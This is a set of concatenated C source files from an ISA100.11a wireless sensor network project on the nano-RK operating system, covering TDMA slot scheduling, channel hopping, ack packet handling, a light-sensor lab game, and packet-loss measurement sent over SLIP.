_isa_ready = 0;
// wait for isa ready
do {
nrk_wait_until_next_period ();
}while (_isa_ready == 0);
_isa_ready = 1;
nrk_gpio_clr(NRK_DEBUG_0);
//nrk_time_get (&last_slot_time);// dont know if it is useful
while (1) {
//nrk_gpio_set(NRK_DEBUG_2);
// reset high speed timer and then record the timer value used for calculating offsets
_nrk_high_speed_timer_reset();
slot_start_time = _nrk_high_speed_timer_get();
//nrk_time_get (&last_slot_time);// dont know if it is useful
last_slot = global_slot; //global_slot has been initialized to MAX_ISA_GLOBAL_SLOTS in isa_init()
if (last_slot > MAX_ISA_GLOBAL_SLOTS)
last_slot -= (MAX_ISA_GLOBAL_SLOTS+1);
current_global_slot = global_slot;
/* global_slot should be wrapped */
if (global_slot > MAX_ISA_GLOBAL_SLOTS) {
global_slot -= MAX_ISA_GLOBAL_SLOTS;
global_cycle++;
}
slot = global_slot % ISA_SLOTS_PER_FRAME;
slot_mask = ((uint32_t) 1) << slot;
if(_isa_sync_ok == 1){
#ifdef CHANNEL_HOPPING
channelIndex += next_slot_offset;
currentChannel = slottedPattern[(channelIndex)&0x0F];
isa_set_channel(currentChannel);
if(slot>=22 && isa_node_mode == ISA_GATEWAY){
slowIndex = slowIndex % 3;
currentChannel = slowPattern[slowIndex];
isa_set_channel(currentChannel);
if(slot>=24)
slowIndex++;
}
// printf("CH:%d SL: %d\r\n",currentChannel,slot);
#endif
//printf("%d,%d\n\r",currentChannel,(channelIndex)&0x0F);
//printf("isa_rx_data_ready:%d\r\n",isa_rx_data_ready);
// if TX slot mask and tx ready, send a packet
#ifdef JOIN_PROCESS
if(slot>=22 && isa_node_mode == ISA_GATEWAY)
isa_tx_data_ready |= ((uint32_t) 1 << slot);
#endif
#ifdef TX_RX_DEBUG
//printf("R\r\n");
nrk_gpio_set(NRK_DEBUG_0);
#endif
if (slot_mask & isa_tx_data_ready & isa_tdma_tx_mask){
//printf("isa tx slot %d.\n\r",slot);
// printf("TX %d,%d,%d\n\r",currentChannel,(channelIndex)&0x0F,slot);
//printf("tx\n\r");
_isa_tx (slot);
previous_tx_slot = slot;
#ifdef HIGH_TIMER_DEBUG
//printf("TX later, high speed timer value is %d.\n\r", _nrk_high_speed_timer_get());
#endif
} else if ((slot_mask & isa_tdma_rx_mask) && (isa_rx_data_ready == 0)){// if RX slot mask and rx not ready, try to receive a packet
#ifdef TX_RX_DEBUG
//printf("R\r\n");
//nrk_gpio_set(NRK_DEBUG_0);
#endif
//printf("isa rx slot %d.\n\r",slot);
// printf("RX %d,%d %d\n\r",currentChannel,(channelIndex)&0x0F, slot);
//printf("rx\n\r");
_isa_rx (slot);
}
#ifdef TX_RX_DEBUG
nrk_gpio_clr(NRK_DEBUG_0);
//nrk_gpio_clr(NRK_DEBUG_1);
#endif
// if RX slot mask and RX buffer free, try to receive a packet
/*else if ((slot_mask & rtl_tdma_rx_mask) && (rtl_rx_data_ready == 0)){
_rtl_rx (slot);
}*/
} else {
///do joining or sync request here
DHDR = configDHDR();
if(isa_node_mode != ISA_GATEWAY){//change
#ifdef JOIN_PROCESS
if(!_isa_join_ok){
_isa_join_process();
}
#endif
_isa_sync_ok = _isa_init_sync();
//printf("waiting for sync...isa_sync_ok is %d.\n\r",_isa_sync_ok);
}else if (isa_node_mode == ISA_GATEWAY){
_isa_sync_ok = 1;
}
}
//nrk_gpio_clr(NRK_DEBUG_2);
//printf("next_slot_offset %d\n\r",next_slot_offset);
// To make sure that initial sync is correct
/*if(FIRST){
//printf("%d\n\r",_nrk_os_timer_get ());
next_slot_offset = 1;
FIRST = 0;
}*/
if(slot_expired >= EXPIRATION && isa_node_mode != ISA_GATEWAY){
//printf("re-sync\n\r");
_isa_sync_ok = 0;
slot_expired = 0;
global_slot = 100;
next_slot_offset = 0;
resync_times++;
if(isa_id!=0){
channelIndex = isa_clk_src_id;
currentChannel = slottedPattern[channelIndex];
}else{
channelIndex = 0;
currentChannel = slottedPattern[channelIndex];
}
isa_set_channel(currentChannel);
}else{
//printf("global_slot is %d. global cycle is %d.\n\r",global_slot,global_cycle);
next_slot_offset = isa_get_slots_until_next_wakeup (global_slot);
//printf("NOS:%d\n\r",next_slot_offset);
//printf("%d,%d,%d,%d\n\r",_nrk_os_timer_get (),_nrk_get_next_wakeup (),global_slot,next_slot_offset);
global_slot += next_slot_offset;
//nrk_clr_led (1);
#ifdef LED_SLOT_DEBUG
nrk_led_clr(0);
#endif
offsetY = 0;
//printf("%d\n\r",next_slot_offset);
nrk_wait_until_next_n_periods (next_slot_offset);
#ifdef LED_SLOT_DEBUG
nrk_led_set(0);
#endif
//}
//nrk_set_led (1);
// Set last_slot_time to the time of the start of the slot
}
}
}
void isa_task_config ()
{
isa_task.task = isa_nw_task;
nrk_task_set_stk( &isa_task, isa_task_stack, ISA_STACK_SIZE);
isa_task.prio = 20;
isa_task.FirstActivation = TRUE;
isa_task.Type = BASIC_TASK;
isa_task.SchType = PREEMPTIVE;
isa_task.period.secs = 0;
isa_task.period.nano_secs = 10*NANOS_PER_MS;
isa_task.cpu_reserve.secs = 0;
isa_task.cpu_reserve.nano_secs = 0;
isa_task.offset.secs = 0;
isa_task.offset.nano_secs = 0;
nrk_activate_task (&isa_task);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/projects/SAMPL/pkt_handlers/ack_pkt.c
#include <globals.h>
#include <sampl.h>
#include <ack_pkt.h>
#ifdef NANORK
#include <nrk.h>
#include <nrk_error.h>
#else
#define my_mac 0
#define RF_MAX_PAYLOAD_SIZE 128
#endif
int8_t ack_generate(SAMPL_UPSTREAM_PKT_T *pkt)
{
ACK_PKT_T p;
p.mac_addr=my_mac;
pkt->payload_len = ack_pkt_add( &p, pkt->payload,0);
pkt->num_msgs=1;
pkt->pkt_type=ACK_PKT;
return NRK_OK;
}
int8_t ack_p2p_generate(SAMPL_PEER_2_PEER_PKT_T *pkt)
{
ACK_PKT_T p;
p.mac_addr=my_mac;
pkt->payload_len = ack_pkt_add( &p, pkt->payload,0);
return NRK_OK;
}
int8_t ack_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out)
{
uint8_t len,i,j,k,dup;
ACK_PKT_T p1, p2;
for(i=0; i<in->num_msgs; i++ )
{
dup=0;
// get next ping packet to compare against current outgoing list
ack_pkt_get( &p1, in->payload, i );
for(k=0; k<out->num_msgs; k++ )
{
// get packet from outgoing list and compare against incomming packet
ack_pkt_get( &p2, out->payload, k );
if(p1.mac_addr==p2.mac_addr) dup=1;
}
if(dup==0)
{
// if packet is unique, add to outgoing packet
out->payload_len=ack_pkt_add( &p1, out->payload, out->num_msgs );
out->num_msgs++;
}
}
return NRK_OK;
}
void ack_pkt_get( ACK_PKT_T *p, uint8_t *buf, uint8_t index )
{
p->mac_addr=buf[index*ACK_PKT_SIZE];
}
uint8_t ack_pkt_add( ACK_PKT_T *p, uint8_t *buf, uint8_t index )
{
buf[index*ACK_PKT_SIZE]= p->mac_addr;
return ((index+1)*ACK_PKT_SIZE);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/SAMPL/client_core/.svn/text-base/debug.c.svn-base
#include <debug.h>
#include <nrk.h>
#include <nrk_time.h>
#include <nrk_stats.h>
nrk_task_stat_t t_stat;
nrk_time_t t;
void debug_reset()
{
debug_stats.rx_pkts=0;
debug_stats.tx_pkts=0;
debug_stats.tx_retry=0;
debug_stats.sensor_samples=0;
}
void debug_update()
{
nrk_time_get(&t);
debug_stats.uptime.secs=t.secs;
debug_stats.uptime.nano_secs=t.nano_secs;
nrk_stats_get_deep_sleep(&t);
debug_stats.deep_sleep.secs=t.secs;
debug_stats.deep_sleep.nano_secs=t.nano_secs;
nrk_stats_get(0, &t_stat);
t=_nrk_ticks_to_time(t_stat.total_ticks);
debug_stats.idle_time.secs=t.secs;
debug_stats.idle_time.nano_secs=t.nano_secs;
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/lab2/slave/.svn/text-base/main.c.svn-base
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <rt_link.h>
#include <nrk_error.h>
#include <nrk_events.h>
#include <nrk_driver.h>
#include <nrk_driver_list.h>
#include <ff_basic_sensor.h>
#include <math.h>
#define MY_CHANNEL 13
#define MOLE_ID 4
#define LIGHT_DIFF 20 // Determined experimentally
#define MASTER_TX_SLOT 0
#define MY_TX_SLOT ((MOLE_ID*2)+2)
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
int
main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
nrk_register_drivers();
rtl_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t rssi, slot,length, mole_id;
uint8_t *local_rx_buf;
uint8_t fd,val;
uint16_t light = 0;
uint16_t light_avg = 0;
uint8_t whacked = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
printf( "Node ID=%d\r\n",MOLE_ID);
nrk_led_set(GREEN_LED);
rtl_init (RTL_MOBILE);
rtl_set_channel(MY_CHANNEL);
rtl_set_schedule( RTL_RX, MASTER_TX_SLOT, 1 );
rtl_set_schedule( RTL_TX, MY_TX_SLOT, 1 );
rtl_start();
rtl_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!rtl_ready()) nrk_wait_until_next_period();
fd=nrk_open(FIREFLY_SENSOR_BASIC,READ);
if(fd==NRK_ERROR) nrk_kprintf(PSTR("Failed to open sensor driver\r\n"));
nrk_time_get(&timeout);
nrk_time_get(&timeend);
val=nrk_set_status(fd,SENSOR_SELECT,LIGHT);
// Get current lighting
for(i=0;i<5;i++){
nrk_read(fd,&light,2);
light_avg += light;
}
/*nrk_read(fd,&light,2);
light_avg += light;
nrk_read(fd,&light,2);
light_avg += light;
nrk_read(fd,&light,2);
light_avg += light;
nrk_read(fd,&light,2);
light_avg += light;
nrk_read(fd,&light,2);
light_avg += light;*/
light_avg /= 5;
//printf( "Light value = %d\r\n", light);
while(1) {
if( rtl_tx_pkt_check(MY_TX_SLOT)!=0 ) {
nrk_led_clr(RED_LED);
printf( "Pending on slot %d\r\n",MY_TX_SLOT );
} else {
//read sensor output to see whether mole is whacked, and print reading
nrk_read(fd,&light,2);
printf( "Light value = %d\r\n", light);
// if light closed or mole whacked, then transmit '1' - indicates the master to change the mole
// If the light darkens by a pre-set difference, count as a whack
if (light_avg+LIGHT_DIFF < light || whacked == 1) {
sprintf(&tx_buf[PKT_DATA_START],"MOLE_ID=%d LIGHT=1", MOLE_ID);
} else {
sprintf(&tx_buf[PKT_DATA_START],"MOLE_ID=%d LIGHT=0", MOLE_ID);
// Update average
/*light_avg = 0;
for(i=0;i<5;i++){
nrk_read(fd,&light,2);
light_avg += light;
}
light_avg /= 5;*/
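// Exponentially weighted running average: light_avg = (5*light_avg + light) / 6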
light_avg *= 5;
light_avg += light;
light_avg /= 6;
//light_avg >>= 1;
//light_avg &= 0xffff;
}
// Transmit
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
rtl_tx_pkt( tx_buf, length, MY_TX_SLOT);
printf( "\nTX on slot %d\r\n",MY_TX_SLOT);
for(i=PKT_DATA_START;i<length;i++)
printf("%c",tx_buf[i]);
nrk_led_toggle(BLUE_LED);
}
if( rtl_rx_pkt_check()!=0 ) {
local_rx_buf=rtl_rx_pkt_get(&length, &rssi, &slot);
printf( "RX on slot %d %d: ",slot,length );
for(i=PKT_DATA_START; i<length; i++ )
printf( "%c",local_rx_buf[i] );
// buffer position 37 stores the next mole id from the master
// if that is equal to MYMOLEID then turn on the led
if((local_rx_buf[37]-48) == MOLE_ID) {
if (light_avg + LIGHT_DIFF < light || whacked == 1) {
whacked = 1;
nrk_led_clr(RED_LED);
} else {
nrk_led_set(RED_LED);
}
} else {
whacked = 0;
nrk_led_clr(RED_LED);
}
//printf(" rounds value %d ", local_rx_buf[51]-48);
//printf("\n NEW: %c",local_rx_buf[37]);
//nrk_kprintf( PSTR("\r\n") );
rtl_rx_pkt_release();
}
// if((local_rx_buf[51]-48)>=9)
// nrk_led_clr(RED_LED);
rtl_wait_until_rx_pkt();
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 1;
TaskOne.period.nano_secs = 0;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 100*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 0;
nrk_activate_task (&TaskOne);
nrk_kprintf( PSTR("Create Done\r\n") );
}
void nrk_register_drivers()
{
int8_t val;
// Register the Basic FireFly Sensor device driver
// Make sure to add:
// #define NRK_MAX_DRIVER_CNT
// in nrk_cfg.h
// Make sure to add:
// SRC += $(ROOT_DIR)/src/drivers/platform/$(PLATFORM_TYPE)/source/ff_basic_sensor.c
// in makefile
val=nrk_register_driver( &dev_manager_ff_sensors,FIREFLY_SENSOR_BASIC);
if(val==NRK_ERROR) nrk_kprintf( PSTR("Failed to load my ADC driver\r\n") );
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa/isa_error.h
#ifndef _ISA_ERROR_H
#define _ISA_ERROR_H
#include <include.h>
#include <stdio.h>
#define LINK_CAPACITY_ERROR 1
#define NEIGHBOR_CAPACITY_ERROR 2
#define TRANSMIT_QUEUE_CAPACITY_ERROR 3
#define MAX_PAYLOAD_ERROR 4
//********************************Extern functions*******************************************
extern void setIsaError(uint8_t);
extern uint8_t getIsaError ();
extern void printIsaError();
//*******************************************************************************************
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/final_project/repeater/spi_matrix.h
#include <include.h>
/*
* this debug pin is connected to SRCLR(serial clear)
* It is used to clear the values held by the shift registers
* Clears on falling edge
*/
#define MATRIX_CLEAR() \
do{\
PORTF &= ~(0x10);\
PORTF |= 0x10;\
}\
while(0)
// Debug-pin variant (kept for reference):
// nrk_gpio_clr(NRK_DEBUG_0);
// nrk_gpio_set(NRK_DEBUG_0);
/*
* This debug pin is connected to RCLK. It is used to make the shift register store its value to the storage register
* and output it on its output lines
*/
#define MATRIX_DISPLAY()\
do{\
PORTF |= 0x20;\
PORTF &= ~(0x20);\
}\
while(0)
// Debug-pin variant (kept for reference):
// nrk_gpio_set(NRK_DEBUG_1);
// nrk_gpio_clr(NRK_DEBUG_1);
#define DISPLAY_INTERVAL_SECS 4
typedef struct {
uint8_t size;
uint8_t pattern[8][3];
uint8_t currentIndex;
}MATRIX_TABLE;
extern void spiSend(void);
extern void spiPatternSend(uint8_t p1, uint8_t p2,uint8_t p3);
extern void setMatrix();
extern void setNewDisplay(uint8_t cIndex, uint8_t nIndex);
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/backup/isa_noresync_without_write_file/recipient/main.c
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
#include <nrk_events.h>
//#define MY_CHANNEL 20
#define MY_TX_SLOT 1
//#define MY_RX_SLOT 2
#define MY_ID 1
#define MY_CLK_SRC_ID 0
#define NUM_OF_TEST_SET 16
#define MAX_SLIP_BUF 17
#define NUM_OF_NODES 3
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
NRK_STK Stack2[NRK_APP_STACKSIZE];
nrk_task_type TaskTwo;
void Task2 (void);
void nrk_create_taskset();
void packet_measurement_better(uint8_t * local_rx_buf);
/*Buffers*/
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t slip_tx_buf[MAX_SLIP_BUF];
uint8_t slip_rx_buf[MAX_SLIP_BUF];
/*packet evaluation related*/
uint8_t pkt_measure[NUM_OF_NODES][NUM_OF_TEST_SET];
uint8_t sendFlag;
uint8_t frame_cnt[NUM_OF_NODES]; //add 1 every 8 packets
uint8_t pkt_cnt[NUM_OF_NODES];
uint8_t current_pkt_index[NUM_OF_NODES];
uint8_t received_pkt_index[NUM_OF_NODES];
uint8_t current_node;
uint8_t send_node;
/* signal related declaration */
int8_t pkt_record_done_signal;
int8_t pkt_record_check()
{
return sendFlag;
}
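/* Register for the signal before checking the flag so that a signal fired
 * between the check and the wait cannot be lost. */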
int8_t wait_until_record_full()
{
nrk_signal_register(pkt_record_done_signal);
if (pkt_record_check() != 0)
return NRK_OK;
nrk_event_wait (SIG(pkt_record_done_signal));
return NRK_OK;
}
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
int
main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t i;
uint8_t length;
uint8_t *local_rx_buf;
int8_t rssi;
uint8_t cnt = 0; /* packet sequence counter; must start defined */
//uint8_t my_tx_slot[4];
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(GREEN_LED);
isa_set_channel_pattern(1);
isa_init(ISA_RECIPIENT,MY_ID, MY_CLK_SRC_ID);
isa_set_schedule(ISA_RECIPIENT,MY_CLK_SRC_ID);
//isa_set_channel(MY_CHANNEL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!isa_ready()) nrk_wait_until_next_period();
/*while(isa_join_ready()!=1) nrk_wait_until_next_period();
for(i=0;i<4;i++){ // set tx slots
if(tx_slot_from_join[i]==0)
break;
else
my_tx_slot[i]=tx_slot_from_join[i];
}
printf("MAIN_TX:%d\r\n",my_tx_slot[0]);*/
pkt_record_done_signal=nrk_signal_create();
if(pkt_record_done_signal==NRK_ERROR){
nrk_kprintf(PSTR("ERROR: creating packet record signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return; /* Task1() is void, so no error code can be returned */
}
while(1) {
//printf("check %d",isa_rx_pkt_check());
nrk_gpio_set(NRK_DEBUG_3);
if( isa_rx_pkt_check()!=0 ) {
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//local_rx_buf[PKT_DATA_START+length-1]='\0';
//printf("length is %d, rssi is %d.\n\r",length,rssi);
//printf( "node %c,%d\r\n",local_rx_buf[PKT_DATA_START+5],local_rx_buf[PKT_DATA_START+7]);
packet_measurement_better(local_rx_buf);
isa_rx_pkt_release();
//printf("\r\n");
}
//printf("send message %d\r\n",cnt);
if(isa_tx_pkt_check(MY_TX_SLOT)!=0){
//printf("Pending TX");
}
else{
sprintf( &tx_buf[PKT_DATA_START],"node %d,%c",MY_ID,cnt++);
//sprintf( &tx_buf[PKT_DATA_START],"3");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
}
//isa_rx_pkt_release();
nrk_gpio_clr(NRK_DEBUG_3);
isa_wait_until_rx_or_tx();
}
}
void Task2 ()
{
uint8_t len,i;
uint8_t zero_killer=0xaa;
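// XOR with 0xaa makes zero bytes unlikely in the SLIP buffer, though a raw
// measurement byte of 0xaa still maps to 0.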
slip_init (stdin, stdout, 0, 0);
wait_until_record_full(); //wait for first batch of packets
while (1) {
//nrk_led_set (ORANGE_LED);
//sprintf (slip_tx_buf, pkt_measure);
//if(sendFlag){
//printf("")
nrk_gpio_set(NRK_DEBUG_1);
//printf("CN:%d\r\n",send_node);
slip_tx_buf[0]=send_node+1;
for(uint8_t i=0;i<NUM_OF_TEST_SET;i++){
slip_tx_buf[i+1]=pkt_measure[send_node][i] ^ zero_killer; //get rid of '\0'
}
//slip_tx_buf[i]=0; // add '\0' at the end
len = strlen (slip_tx_buf);
//printf("%d\r\n",len);
slip_tx (slip_tx_buf, len);
sendFlag=0;
for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[send_node][i]=0;
}
printf("KO,%d\r\n",send_node);
//nrk_wait_until_next_period ();
nrk_gpio_clr(NRK_DEBUG_1);
//}
wait_until_record_full();
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 500*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 500*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 0;
nrk_activate_task (&TaskOne);
TaskTwo.task = Task2;
nrk_task_set_stk( &TaskTwo, Stack2, NRK_APP_STACKSIZE);
TaskTwo.prio = 3;
TaskTwo.FirstActivation = TRUE;
TaskTwo.Type = BASIC_TASK;
TaskTwo.SchType = PREEMPTIVE;
TaskTwo.period.secs = 20;
TaskTwo.period.nano_secs = 0;
TaskTwo.cpu_reserve.secs = 0;
TaskTwo.cpu_reserve.nano_secs = 0;
TaskTwo.offset.secs = 0;
TaskTwo.offset.nano_secs = 100*NANOS_PER_MS;
nrk_activate_task (&TaskTwo);
nrk_kprintf( PSTR("Create Done\r\n") );
}
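/* Records packet reception per node as a bitmap: each byte of
 * pkt_measure[node] covers 8 consecutive packet indices, a set bit meaning
 * the packet arrived. Once NUM_OF_TEST_SET bytes are filled, Task2 is
 * signalled to ship the batch over SLIP. */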
void packet_measurement_better(uint8_t * local_rx_buf)
{
uint8_t i,length;
uint8_t next_pkt_offset;
uint8_t temp;
if(local_rx_buf[PKT_DATA_START]=='n'){
current_node = local_rx_buf[PKT_DATA_START+5]-'0'; // node number
received_pkt_index[current_node] = local_rx_buf[PKT_DATA_START+7];
next_pkt_offset = received_pkt_index[current_node]-current_pkt_index[current_node]; // packet index difference
//printf("%d,%d\r\n",next_pkt_offset,current_node);
//if(next_pkt_offset!=1){
//printf("%d,%d,%d,%d,%d\r\n", local_rx_buf[PKT_DATA_START+7],current_pkt_index[current_node],next_pkt_offset,current_node,isa_get_channel());
if(next_pkt_offset>=20){
printf("HUGE LOSS\r\n");
printf("%d,%d,%d,%d,%d\r\n", local_rx_buf[PKT_DATA_START+7],current_pkt_index[current_node],next_pkt_offset,current_node,isa_get_channel());
}
//}
current_pkt_index[current_node] = local_rx_buf[PKT_DATA_START+7]; // update current pakcet index
pkt_cnt[current_node] += next_pkt_offset; // add the number of packet been measured
temp = current_pkt_index[current_node] % 8; // use 1 byte to record 8 packets
//printf("%d,%d,%d\r\n",temp,frame_cnt[0],pkt_cnt[0]);
if(pkt_cnt[current_node]>=8){
frame_cnt[current_node]+=pkt_cnt[current_node]/8;
pkt_cnt[current_node]=temp;
//printf("current frame cnt: %d\r\n", frame_cnt[current_node]);
}
if(frame_cnt[current_node]>=NUM_OF_TEST_SET){
/*for(i=0;i<NUM_OF_TEST_SET;i++){
printf("pkt: %x\r\n",pkt_measure[current_node][i]);
}*/
//printf("KO %d\r\n",current_node);
// reboot buffer for further test
frame_cnt[current_node]=0;
sendFlag=1;
send_node=current_node;
nrk_event_signal (pkt_record_done_signal);
nrk_spin_wait_us(3000);
/*for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[current_node][i]=0;
}*/
}
//printf("%d,%d,%d\r\n",temp,frame_cnt[0],pkt_cnt[0]);
pkt_measure[current_node][frame_cnt[current_node]] |= ((uint8_t) 1) << temp;
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/backup/isa_with_join_process/final_project/recipient/main.c
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
#include <nrk_events.h>
#define MAX_SLIP_BUF 48
uint8_t slip_rx_buf[MAX_SLIP_BUF];
uint8_t slip_tx_buf[MAX_SLIP_BUF];
//#define MY_CHANNEL 19
//#define MY_TX_SLOT 2
//#define MY_RX_SLOT 2
#define MY_ID 2
#define MY_CLK_SRC_ID 1
NRK_STK Stack1[NRK_APP_STACKSIZE];
NRK_STK Stack2[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
nrk_task_type TaskTwo;
void Task1(void);
void Task2(void);
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
int
main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t i;
uint8_t length;
uint8_t *local_rx_buf;
int8_t rssi;
uint8_t cnt = 0; /* packet sequence counter; must start defined */
uint8_t my_tx_slot[4];
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(GREEN_LED);
isa_init(ISA_RECIPIENT,MY_ID,MY_CLK_SRC_ID);
//isa_set_channel_pattern(1);
//isa_set_schedule(ISA_RECIPIENT,MY_CLK_SRC_ID);
//isa_set_channel(MY_CHANNEL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!isa_ready()) nrk_wait_until_next_period();
while(isa_join_ready()!=1) nrk_wait_until_next_period();
for(i=0;i<4;i++){ // set tx slots
if(tx_slot_from_join[i]==0)
break;
else
my_tx_slot[i]=tx_slot_from_join[i];
}
printf("MAIN_TX:%d\r\n",my_tx_slot[0]);
while(1) {
//printf("check %d",isa_rx_pkt_check());
/*if( isa_rx_pkt_check()!=0 ) {
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//local_rx_buf[PKT_DATA_START+length-1]='\0';
//printf("length is %d, rssi is %d.\n\r",length,rssi);
for(i=PKT_DATA_START; i<length-1; i++ )
printf( "%c",local_rx_buf[i]);
cnt++;
}*/
//printf("send message %d\r\n",cnt);
sprintf( &tx_buf[PKT_DATA_START],"recipient %c", cnt++);
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf,length,configDHDR(),my_tx_slot[0]);
//isa_rx_pkt_release();
isa_wait_until_rx_or_tx();
}
}
void Task2()
{ uint16_t cnt;
uint8_t len;
printf ("My node's address is %d\r\n", NODE_ADDR);
printf ("Task1 PID=%d\r\n", nrk_get_pid ());
cnt = 0;
slip_init (stdin, stdout, 0, 0);
while (1) {
//nrk_led_set (ORANGE_LED);
//printf("Start\n\r");
sprintf (slip_tx_buf, "Hello ALex");
len = strlen (slip_tx_buf);
slip_tx (slip_tx_buf, len);
nrk_wait_until_next_period ();
//nrk_led_clr (ORANGE_LED);
nrk_wait_until_next_period ();
cnt++;
//printf("End\n\r");
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 500*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 500*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 0;
nrk_activate_task (&TaskOne);
nrk_kprintf( PSTR("Create Done\r\n") );
TaskTwo.task = Task2;
TaskTwo.Ptos = (void *) &Stack2[NRK_APP_STACKSIZE-1];
TaskTwo.Pbos = (void *) &Stack2[0];
TaskTwo.prio = 15;
TaskTwo.FirstActivation = TRUE;
TaskTwo.Type = BASIC_TASK;
TaskTwo.SchType = PREEMPTIVE;
TaskTwo.period.secs = 1;
TaskTwo.period.nano_secs = 500*NANOS_PER_MS;
TaskTwo.cpu_reserve.secs = 1;
TaskTwo.cpu_reserve.nano_secs = 500*NANOS_PER_MS;
TaskTwo.offset.secs = 0;
TaskTwo.offset.nano_secs= 0;
//nrk_activate_task (&TaskTwo);
nrk_kprintf( PSTR("Create Done\r\n") );
}
|
7a42c524382734a4acd28ec73fc41fc548d263ea
|
[
"Markdown",
"C",
"Makefile"
] | 47
|
C
|
echiacchiarini/OpenISA
|
b0d49a6e02aa7cf064dff93fc1806598eb2165b7
|
